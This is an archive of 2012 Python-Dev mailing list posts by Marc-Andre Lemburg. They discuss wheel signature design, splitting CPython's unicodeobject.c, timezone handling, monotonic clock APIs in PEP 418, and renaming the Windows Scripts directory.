2012-11-13 Thread M.-A. Lemburg
On 13.11.2012 10:51, Martin v. Löwis wrote:
 Am 13.11.12 03:04, schrieb Nick Coghlan:
 On Mon, Oct 29, 2012 at 4:47 AM, Daniel Holth dho...@gmail.com
 mailto:dho...@gmail.com wrote:

 I think Metadata 1.3 is done. Who would like to czar?

 (Apologies for the belated reply, it's been a busy few weeks)

 I'm happy to be BDFL delegate for these. I'd like to see PEP 425 updated
 with some additional rationale based on Ronald's comments later in this
 thread, though.
 
 For the record, I'm still -1 on PEP 427, because of the signature issues.
 
 The FAQ in the PEP is incorrect in claiming PGP or X.509 cannot
 readily be used to verify the integrity of an archive - the whole
 point of these technologies is to do exactly that.
 
 The FAQ is entirely silent on why it is not using a more standard
 signature algorithm such as ECDSA. It explains why it uses Ed25519,
 but ignores that the very same rationale would apply to ECDSA as well;
 plus that would be one of the standard JWS algorithms.
 
 In addition, the FAQ claims that the format is designed to introduce
 cryptopgraphy that is actually used, yet leaves the issue of key
 distribution alone (except that pointing out that you can put them
 into requires.txt - a file that doesn't seem to be specified anywhere).

I agree with Martin. If the point is to to protect against cryptography
that is not used, then not using the de-facto standard in signing
open source distribution files, which today is PGP/GPG, misses that
point :-)

Note that signing such distribution files can be handled outside
of the wheel format PEP. It just way to complex and out of scope
for the wheel format itself. Also note that PGP/GPG and the other
signing tools work well on any distribution file. There's really no
need to build these into the format itself.

It's a good idea to check integrity, but that can be done using
hashes.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 13 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 08:42, Nick Coghlan wrote:
 Why are any of these codecs here in unicodeobjectland in the first
 place?  Sure, they're needed so that Python can find its own stuff,
 but in principle *any* codec could be needed.  Is it just an heuristic
 that the codecs needed for 99% of the world are here, and other codecs
 live in separate modules?
 
 I believe it's a combination of history and whether or not they're
 needed by the interpreter during the bootstrapping process before the
 encodings namespace is importable.

They are in unicodeobject.c so that the compilers can inline the
code in the various other places where they are used in the Unicode
implementation directly as necessary and because the codecs use
a lot of functions from the Unicode API (obviously), so the other
direction of inlining (Unicode API in codecs) is needed as well.

BTW: When discussing compiler optimizations, please remember that
there are more compilers out there than just GCC and also the fact
that not everyone is using the latest and greatest version of it.
Link time inlining will usually not be as efficient as compile time
optimization and we need every bit of performance we can get
for Unicode in Python 3.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 25 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-09-27: Released eGenix PyRun 1.1.0 ...   http://egenix.com/go35
2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34
2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 08:42, Nick Coghlan wrote:
 unicodeobject.c is too big, and should be restructured to make any
 natural modularity explicit, and provide an easier path for users that
 want to understand how the unicode implementation works.

You can also achieve that goal by structuring the code in unicodeobject.c
in a more modular way. It is already structured in sections, but
there's always room for improvement, of course.

As mentioned before, it is impossible to split out various sections
into separate .c or .h files which then get included in the main
unicodeobject.c. If that's where consensus is going, I'm with Stephen
here in that such a separation should be done in higher level
chunks, rather than creating 10 new files.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 25 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-09-27: Released eGenix PyRun 1.1.0 ...   http://egenix.com/go35
2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34
2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 11:18, Maciej Fijalkowski wrote:
 On Thu, Oct 25, 2012 at 8:57 AM, M.-A. Lemburg m...@egenix.com wrote:
 On 25.10.2012 08:42, Nick Coghlan wrote:
 Why are any of these codecs here in unicodeobjectland in the first
 place?  Sure, they're needed so that Python can find its own stuff,
 but in principle *any* codec could be needed.  Is it just an heuristic
 that the codecs needed for 99% of the world are here, and other codecs
 live in separate modules?

 I believe it's a combination of history and whether or not they're
 needed by the interpreter during the bootstrapping process before the
 encodings namespace is importable.

 They are in unicodeobject.c so that the compilers can inline the
 code in the various other places where they are used in the Unicode
 implementation directly as necessary and because the codecs use
 a lot of functions from the Unicode API (obviously), so the other
 direction of inlining (Unicode API in codecs) is needed as well.
 
 I'm sorry to interrupt, but have you actually measured? What effect
 the lack of said inlining has on *any* benchmark is definitely beyond
 my ability to guess and I suspect is beyond the ability to guess of
 anyone else on this list.
 
 I challenge you to find a benchmark that is being significantly
 affected (15%) with the split proposed by Victor. It does not even
 have to be a real-world one, although that would definitely buy it
 more credibility.

I think you misunderstood. What I described is the reason for having
the base codecs in unicodeobject.c.

I think we all agree that inlining has a positive effect on
performance. The scale of the effect depends on the used compiler
and platform.

Victor already mentioned that he'll check the impact of his
proposal, so let's wait for that.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 25 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-09-27: Released eGenix PyRun 1.1.0 ...   http://egenix.com/go35
2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34
2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-23 Thread M.-A. Lemburg
On 23.10.2012 10:22, Benjamin Peterson wrote:
 2012/10/22 Victor Stinner victor.stin...@gmail.com:
 Hi,

 I forked CPython repository to work on my split unicodeobject.c project:
 http://hg.python.org/sandbox/split-unicodeobject.c

 The result is 10 files (included the existing unicodeobject.c):

   1176 Objects/unicodecharmap.c
   1678 Objects/unicodecodecs.c
   1362 Objects/unicodeformat.c
253 Objects/unicodeimpl.h
733 Objects/unicodelegacy.c
   1836 Objects/unicodenew.c
   2777 Objects/unicodeobject.c
   2421 Objects/unicodeoperators.c
   1235 Objects/unicodeoscodecs.c
   1288 Objects/unicodeutfcodecs.c
  14759 total

 This is just a proposition (and work in progress). Everything can be changed 
 :-)

 unicodenew.c is not a good name. Content of this file may be moved
 somewhere else.

 Some files may be merged again if the separation is not justified.

 I don't like the unicode prefix for filenames, I would prefer a new 
 directory.

 --

 Shorter files are easier to review and maintain. The compilation is
 faster if only one file is modified.

 The MBCS codec requires windows.h. The whole unicodeobject.c includes
 it just for this codec. With the split, only unicodeoscodecs.c
 includes this file.

 The MBCS codec needs also a winver variable. This variable is
 defined between the BLOOM filter and the unicode_result_unchanged()
 function. How can you explain how these things are sorted? Where
 should I add a new function or variable? With the split, the variable
 is now defined very close to where is it used. You don't have to
 scroll 7000 lines to see where it is used.

 If you would like to work on a specific function, you don't have to
 use the search function of your editor to skip thousands to lines. For
 example, the 18 functions and 2 types related to the charmap codec are
 now grouped into one unique and short C file.

 It was already possible to extend and maintain unicodeobject.c (some
 people proved it!), but it should now be much simpler with shorter
 files.
 
 I would like to repeat my opposition to splitting unicodeobject.c. I
 don't think the benefits of such a split have been well justified,
 certainly not to the point that the claim about much simpler
 maintenance is true.

Same feelings here.

If you do go ahead with such a split, please only split the source
files and keep the unicodeobject.c file which then includes all
the other files. Such a restructuring should not result in compilers
no longer being able to optimize code by inlining functions
in one of the most important basic types we have in Python 3.

Also note that splitting the file in multiple smaller ones will
actually create more maintenance overhead, since patches will
likely no longer be easy to merge from 3.3 to 3.4.

BTW: The positive effect of having everything in one file is
that you no longer have to figure which files to look when
trying to find a piece of logic... it's just a ctrl-f or
ctrl-s away :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 23 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-09-27: Released eGenix PyRun 1.1.0 ...   http://egenix.com/go35
2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34
2012-09-25: Released mxODBC 3.2.1 ... http://egenix.com/go33
2012-10-23: Python Meeting Duesseldorf ... today

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Split unicodeobject.c into subfiles?

2012-10-05 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 I would like to split the huge unicodeobject.c file into smaller
 files. It's just the longest C file of CPython: 14,849 lines.
 
 I don't know exactly how to split it, but first I would like to know
 if you would agree with the idea.
 
 Example:
  - Objects/unicode/codecs.c
  - Objects/unicode/mod_format.c
  - Objects/unicode/methods.c
  - Objects/unicode/operators.c
  - etc.
 
 I don't know if it's better to use a subdirectory, or use a prefix for
 new files: Objects/unicode_methods.c, Objects/unicode_codecs.c, etc.
 There is already a Python/codecs.c file for example (same filename).

Better follow the already existing pattern of using unicode as
prefix, e.g. unicodectype.c and unicodetype_db.h.

 I would like to split the unicodeobject.c because it's hard to
 navigate in this huge file between all functions, variables, types,
 macros, etc. It's hard to add new code and to fix bugs. For example,
 the implementation of str%args takes 1000 lines, 2 types and 10
 functions (since my refactor yesterday, in Python 3.3 the main
 function is 500 lines long :-)).
 
 I only see one argument against such refactoring: it will be harder to
 backport/forwardport bugfixes.

When making such a change, you have to pay close attention to
functions that the compiler can potentially inline. AFAIK, moving
such functions into a separate file would prevent such
inlining/optimizations, e.g. the str formatter wouldn't be
able to inline codec calls if placed in separate .c files.

It may be better to split the file into multiple .h files which
then get recombined into the one unicodeobject.c file.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 05 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-09-27: Released eGenix PyRun 1.1.0 ...   http://egenix.com/go35
2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34
2012-09-25: Released mxODBC 3.2.1 ... http://egenix.com/go33
2012-10-23: Python Meeting Duesseldorf ... 18 days to go

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] TZ-aware local time

2012-06-06 Thread M.-A. Lemburg
Just to add my 2 cents to this discussion as someone who's worked
with mxDateTime for almost 15 years.

I think we all agree that users of an application want to input
date/time data using their local time (which may very well not be
the timezone of the system running the application). On output
they want to see their timezone as well, for obvious reasons.

Now timezones are by nature not strictly defined, they change very
often in history and what's worse: there's no way to predict the
timezone details for the future. In many places around the world,
the government defines the timezone data and they keep on changing
the aspects every now and then, support day light savings time,
drop the support, remove timezones for their countries, add
new ones, or simply shift to a different time zone.

The only timezone data that's more or less defined is historic
timezone data, but even there, different sources can give different
data.

What does this mean for the application ?

An application doesn't care about the timezone of a point in date/time.
It just wants a standard way to store the date/time and a reliable
way to work with it.

The most commonly used standard for this is the UTC standard and
so it's become good practice to convert all date/time values in
applications to UTC for storage, math and manipulation.

Just like with Unicode, the conversion to local time of the user
happens at the UI level. Conversion from input data to UTC is
easy, given the available C lib mechanisms (relying on the tz
database). Conversion from UTC to local time is more difficult,
but can also be done using the tz database.

The timezone information of the entered data or the user's
locale is usually available either through the environment,
a configuration file or a database storing the original
data - both on the input and on the output side. There's
no need to stick this information onto the basic data types,
since the application will already know anyway.

For most use cases, this strategy works out really well.
There are some cases, though, where you do need to work with
local time instead of UTC.

One such case is the definition of relative date/time values,
another related one, the definition of repeating date/time
values.

These are often defined by users in terms of their local
time or relative to other timezones they intend to
travel to, so in order to convert the definitions back
to UTC you have to run part of the calculation in the
resp. local time zone.

Repeating date/time values also tend to take other data
into account such as bank holidays, opening times, etc.
There's no end to making this more and more complicated :-)

However, these things are not in the realm of a basic
type anymore. They are application specific details.
As a result, it's better to provide tools to implement
all this, but not try force design decisions onto
the application writer (which will eventually get in
the way).

BTW: That's main reason why I have so far refused to add
native timezone support to the mxDateTime data types and
instead let the applications decide on what's the best way
for their particular use case. mxDateTime does provide
extra tools for timezone support, but doesn't get in the
way. It has so far worked out really well.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 06 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-07-17: Python Meeting Duesseldorf ... 41 days to go
2012-07-02: EuroPython 2012, Florence, Italy ...   26 days to go
2012-05-16: Released eGenix pyOpenSSL 0.13 ...http://egenix.com/go29

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] [RFC] PEP 418: Add monotonic time, performance counter and process time functions

2012-04-15 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Here is a simplified version of the first draft of the PEP 418. The
 full version can be read online.
 http://www.python.org/dev/peps/pep-0418/
 
 The implementation of the PEP can be found in this issue:
 http://bugs.python.org/issue14428
 
 I post a simplified version for readability and to focus on changes
 introduced by the PEP. Removed sections: Existing Functions,
 Deprecated Function, Glossary, Hardware clocks, Operating system time
 functions, System Standby, Links.

Looks good.

I'd suggest to also include a tool or API to determine the
real resolution of a time function (as opposed to the advertised
one). See pybench's clockres.py helper as example. You often
find large differences between the advertised resolution and
the available one, e.g. while process timers often advertise
very good resolution, they are in fact often only updated
at very coarse rates.

E.g. compare the results of clockres.py on Linux:

Clock resolution of various timer implementations:
time.clock:1.000us
time.time: 0.954us
systimes.processtime:999.000us

and FreeBSD:

Clock resolution of various timer implementations:
time.clock: 7812.500us
time.time: 1.907us
systimes.processtime:  1.000us

and Mac OS X:

Clock resolution of various timer implementations:
time.clock:1.000us
time.time: 0.954us
systimes.processtime:  1.000us

Regarding changing pybench:
pybench has to stay backwards incompatible with
earlier releases to make it possible to compare timings.
You can add support for new timers to pybench, but please leave
the existing timers and defaults in place.

 ---
 
 PEP: 418
 Title: Add monotonic time, performance counter and process time functions
 Version: f2bb3f74298a
 Last-Modified: 2012-04-15 17:06:07 +0200 (Sun, 15 Apr 2012)
 Author: Cameron Simpson c...@zip.com.au, Jim Jewett
 jimjjew...@gmail.com, Victor Stinner victor.stin...@gmail.com
 Status: Draft
 Type: Standards Track
 Content-Type: text/x-rst
 Created: 26-March-2012
 Python-Version: 3.3
 
 Abstract
 
 
 This PEP proposes to add ``time.get_clock_info(name)``,
 ``time.monotonic()``, ``time.perf_counter()`` and
 ``time.process_time()`` functions to Python 3.3.
 
 Rationale
 =
 
 If a program uses the system time to schedule events or to implement
 a timeout, it will not run events at the right moment or stop the
 timeout too early or too late when the system time is set manually or
 adjusted automatically by NTP.  A monotonic clock should be used
 instead to not be affected by system time updates:
 ``time.monotonic()``.
 
 To measure the performance of a function, ``time.clock()`` can be used
 but it is very different on Windows and on Unix.  On Windows,
 ``time.clock()`` includes time elapsed during sleep, whereas it does
 not on Unix.  ``time.clock()`` precision is very good on Windows, but
 very bad on Unix.  The new ``time.perf_counter()`` function should be
 used instead to always get the most precise performance counter with a
 portable behaviour (ex: include time spend during sleep).
 
 To measure CPU time, Python does not provide directly a portable
 function.  ``time.clock()`` can be used on Unix, but it has a bad
 precision.  ``resource.getrusage()`` can also be used on Unix, but it
 requires to get fields of a structure and compute the sum of time
 spent in kernel space and user space.  The new ``time.process_time()``
 function acts as a portable counter that always measures CPU time
 (doesn't include time elapsed during sleep) and has the best available
 precision.
 
 Each operating system implements clocks and performance counters
 differently, and it is useful to know exactly which function is used
 and some properties of the clock like its resolution and its
 precision.  The new ``time.get_clock_info()`` function gives access to
 all available information of each Python time function.
 
 New functions:
 
 * ``time.monotonic()``: timeout and scheduling, not affected by system
   clock updates
 * ``time.perf_counter()``: benchmarking, most precise clock for short
   period
 * ``time.process_time()``: profiling, CPU time of the process
 
 Users of new functions:
 
 * time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess,
   telnet and threading modules to implement timeout
 * time.perf_counter(): trace and timeit modules, pybench program
 * time.process_time(): profile module
 * time.get_clock_info(): pybench program to display information about the
   timer like the precision or the resolution
 
 The ``time.clock()`` function is deprecated because it is not
 portable: it behaves differently depending on the operating system.
 ``time.perf_counter()`` or ``time.process_time()`` should be used
 instead, depending on your requirements. ``time.clock()`` is marked as
 deprecated but is not planned for removal.
 
 
 Python functions
 
 
 New Functions
 -
 
 

Re: [Python-Dev] Use QueryPerformanceCounter() for time.monotonic() and/or time.highres()?

2012-04-03 Thread M.-A. Lemburg
Victor Stinner wrote:
 You seem to have missed the episode where I explained that caching the last
 value in order to avoid going backwards doesn't work -- at least not if the
 cached value is internal to the API implementation.

 Yes, and I can't find it by briefly searching my mail.  I haven't had the 
 energy to follow every bit of this discussion because it has become 
 completely insane.
 
 I'm trying to complete the PEP, but I didn't add this part yet.
 
 Of course we cannot promise not moving backwards, since there is a 64 bit 
 wraparound some years in the future.
 
 Some years? I computed 584.5 years, so it should not occur in
 practice. 32-bit wraparound is a common issue which occurs in practice
 on Windows (49.7 days wraparound), and I propose a workaround in the
 PEP (already implemented in the related issue).
 
 Here's actual code from production:

 BOOL WINAPI QueryPerformanceCounterCCP( LARGE_INTEGER* li )
 {
static LARGE_INTEGER last = {0};
BOOL ok = QueryPerformanceCounter(li);
if( !ok )
{
return FALSE;
}
 
 Did you already see it failing in practice? Python ignores the return
 value and only uses the counter value.
 
 Even negative delta values of time are usually  harmless on the application 
 level.
  A curiosity, but harmless.
 
 It depends on your usecase. For a scheduler or to implement a timeout,
 it does matter. For a benchmark, it's not an issue because you usually
 repeat a test at least 3 times. Most advanced benchmarked tools gives
 a confidence factor to check if the benchmark ran fine or not.
 
  I am offering empirical evidence here from hundreds of thousands of 
 computers
 over six years: For timing and benchmarking, QPC is good enough, and will 
 only
 be as precise as the hardware and operating system permits, which in practice
 is good enough.
 
 The PEP contains also different proofs that QPC is not steady,
 especially on virtual machines.

I'm not sure I understand what you are after here, Victor. For benchmarks
it really doesn't matter if one or two runs fail due to the timer having
a problem: you just repeat the run and ignore the false results (you
have such issues in all empirical studies). You're making things
needlessly complicated here.

Regarding the approach to try to cover all timing requirements into
a single time.steady() API, I'm not convinced that this is good
approach. Different applications have different needs, so it's
better to provide interfaces to what the OS has to offer and
let the application decide what's best.

If an application wants to have a monotonic clock, it should use
time.monotonic(). The OS doesn't provide it, you get an AttributeError
and revert to some other function, depending on your needs.

Having a time.steady() API make this decision for you, is not
going to make your application more portable, since the choice
will inevitably be wrong in some cases (e.g. going from
CLOCK_MONOTONIC to time.time() as fallback).

BTW: You might also want to take a look at the systimes.py module
in pybench. We've been through discussions related to
benchmark timing in 2006 already and that module summarizes
the best practice outcome :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 03 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-04-03: Python Meeting Duesseldorf today

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python install layout and the PATH on win32 (Rationale part 1: Regularizing the layout)

2012-03-23 Thread M.-A. Lemburg


VanL wrote:
 As this has been brought up a couple times in this subthread, I figured that 
 I would lay out the
 rationale here.
 
 There are two proposals on the table: 1) Regularize the install layout, and 
 2) move the python
 binary to the binaries directory. This email will deal with the first, and a 
 second email will deal
 with the second.
 
 1) Regularizing the install layout:
 
 One of Python's strengths is its cross-platform appeal. Carefully-
 written Python programs are frequently portable between operating
 systems and Python implementations with very few changes. Over the
 years, substantial effort has been put into maintaining platform
 parity and providing consistent interfaces to available functionality,
 even when different underlying implementations are necessary (such
 as with ntpath and posixpath).
 
 One place where Python is unnecessarily different, however, is in
 the layout and organization of the Python environment. This is most
 visible in the name of the directory for binaries on the Windows platform 
 (Scripts) versus the
 name of the directory for binaries on every other platform (bin), but a 
 full listing of the
 layouts shows
 substantial differences in layout and capitalization across platforms.
 Sometimes the include is capitalized (Include), and sometimes not; and
 the python version may or may not be included in the path to the
 standard library or not.
 
 This may seem like a harmless inconsistency, and if that were all it was, I 
 wouldn't care. (That
 said, cross-platform consistency is its own good). But it becomes a real pain 
 when combined with
 tools like virtualenv or the new pyvenv to create cross-platform development 
 environments.
 
 In particular, I regularly do development on both Windows and a Mac, and then 
 deploy on Linux. I do
 this in virtualenvs, so that I have a controlled and regular environment. I 
 keep them in sync using
 source control.
 
 The problem comes when I have executable scripts that I want to include in my 
 dvcs - I can't have it
 in the obvious place - the binaries directory - because *the name of the 
 directory changes when you
 move between platforms.* More concretely, I can't hg add Scripts/runner.py? 
 on my windows
 environment (where it is put in the PATH by virtualenv) and thendo a pull on 
 Mac or Linux and have
 it end up properly in bin/runner.py which is the correct PATH for those 
 platforms.
 
 This applies anytime there are executable scripts that you want to manage 
 using source control
 across platforms. Django projects regularly have these, and I suspect we will 
 be seeing more of this
 with the new project support in virtualenvwrapper.
 
 While a few people have wondered why I would want this -- hopefully answered 
 above -- I have not
 heard any opposition to this part of the proposal.
 
 This first proposal is just to make the names of the directories match across 
 platforms. There are
 six keys defined in the installer files (sysconfig.cfg and 
 distutils.command.install): 'stdlib',
 'purelib', 'platlib', 'headers', 'scripts',  and 'data'.
 
 Currently on Windows, there are two different layouts defined:
 
   'nt': {
 'stdlib': '{base}/Lib',
 'platstdlib': '{base}/Lib',
 'purelib': '{base}/Lib/site-packages',
 'platlib': '{base}/Lib/site-packages',
 'include': '{base}/Include',
 'platinclude': '{base}/Include',
 'scripts': '{base}/Scripts',
 'data'   : '{base}',
 },
 
   'nt_user': {
 'stdlib': '{userbase}/Python{py_version_nodot}',
 'platstdlib': '{userbase}/Python{py_version_nodot}',
 'purelib': '{userbase}/Python{py_version_nodot}/site-packages',
 'platlib': '{userbase}/Python{py_version_nodot}/site-packages',
 'include': '{userbase}/Python{py_version_nodot}/Include',
 'scripts': '{userbase}/Scripts',
 'data'   : '{userbase}',
 },
 
 
 The proposal is to make all the layouts change to:
 
   'nt': {
 'stdlib': '{base}/lib',
 'platstdlib': '{base}/lib',
 'purelib': '{base}/lib/site-packages',
 'platlib': '{base}/lib/site-packages',
 'include': '{base}/include',
 'platinclude': '{base}/include',
 'scripts': '{base}/bin',
 'data'   : '{base}',
 },
 
 The change here is that 'Scripts' will change to 'bin' and the capitalization 
 will be removed. Also,
 user installs of Python will have the same internal layout as system 
 installs of Python. This
 will also, not coincidentally, match the install layout for posix, at least 
 with regard to the
 'bin', 'lib', and 'include' directories.
 
 Again, I have not heard *anyone* objecting to this part of the proposal as it 
 is laid out here.
 (Paul had a concern with the lib directory earlier, but he said he was ok 
 with the above).
 
 Please let me know if you have any problems or concerns with this part 1.

Since userbase will usually be a single directory in the home
dir of a user, the above would loose the possibility to support
multiple Python versions 

Re: [Python-Dev] Python install layout and the PATH on win32

2012-03-21 Thread M.-A. Lemburg


Lindberg, Van wrote:
 Mark, MAL, Martin, Tarek,
 
 Could you comment on this?
 
 This is in the context of changing the name of the 'Scripts' directory 
 on windows to 'bin'. Éric brings up the point (explained more below) 
 that if we make this change, packages made/installed the new packaging 
 infrastructure and those made/installed with bdist_winist and the old 
 (frozen) distutils will be inconsistent.
 
 The reason why is that the old distutils has a hard-coded dict in 
 distutils.command.install that would point to the old locations. If we 
 were to make this change in sysconfig.cfg, we would probably want to 
 make a corresponding change in the INSTALL_SCHEMES dict in 
 distutils.command.install.

I'm not sure I understand the point in making that change.

Could you expand on the advantage of using bin instead
of Scripts ?

Note that distutils just provides defaults for these installation
locations. All of them can be overridden using command line
arguments to the install command.

FWIW: I've dropped support for bdist_wininst in mxSetup.py
since bdist_msi provides much better system integration.

 More context:
 
 On 3/20/2012 10:41 PM, Éric Araujo wrote:
 Le 20/03/2012 21:40, VanL a écrit :
 On Tuesday, March 20, 2012 at 5:07 PM, Paul Moore wrote:
 It's worth remembering Éric's point - distutils is frozen and changes
 are in theory not allowed. This part of the proposal is not possible
 without an exception to that ruling. Personally, I don't see how
 making this change could be a problem, but I'm definitely not an
 expert.

 If distutils doesn't change, bdist_wininst installers built using
 distutils rather than packaging will do the wrong thing with regard to
 this change. End users won't be able to tell how an installer has been
 built.
 
 Looking at the code in bdist_wininst, it loops over the keys in the 
 INSTALL_SCHEMES dict to find the correct locations. If the hard-coded 
 dict were changed, then the installer would 'just work' with the right 
 location - and this matches my experience having made this sort of 
 change. When I change the INSTALL_SCHEMES dict, things get installed 
 according to the new scheme without difficulty using the standard tools. 
 The only time when something is trouble is if it does its own install 
 routine and hard-codes 'Scripts' as the name of the install directory - 
 and I have only seen that in PyPM a couple versions ago.
 
 
  From the top of my head the developers with the most experience about
 Windows deployment are Martin v. Löwis, Mark Hammond and Marc-André
 Lemburg (not sure about the Windows part for MAL, but he maintains a
 library that extends distutils and has been broken in the past).  I
 think their approval is required for this kind of huge change.
 
 Note the above - this is why I would like your comment.
 
 
 The point of the distutils freeze (i.e. feature moratorium) is that we
 just can’t know what complicated things people are doing with
 undocumented internals, because distutils appeared unmaintained and
 under-documented for years and people had to work with and around it;
 since the start of the distutils2 project we can Just Say No™ to
 improvements and features in distutils.  “I don’t see what could
 possibly go wrong” is a classic line in both horror movies and distutils
 developmentwink.

 Renaming Scripts to bin on Windows would have effects on some tools we
 know and surely on many tools we don’t know.  We don’t want to see again
 people who use or extend distutils come with torches and pitchforks
 because internals were changed and we have to revert.  So in my opinion,
 to decide to go ahead with the change we need strong +1s from the
 developers I named above and an endorsement by Tarek, or if he can’t
 participate in the discussion, Guido.

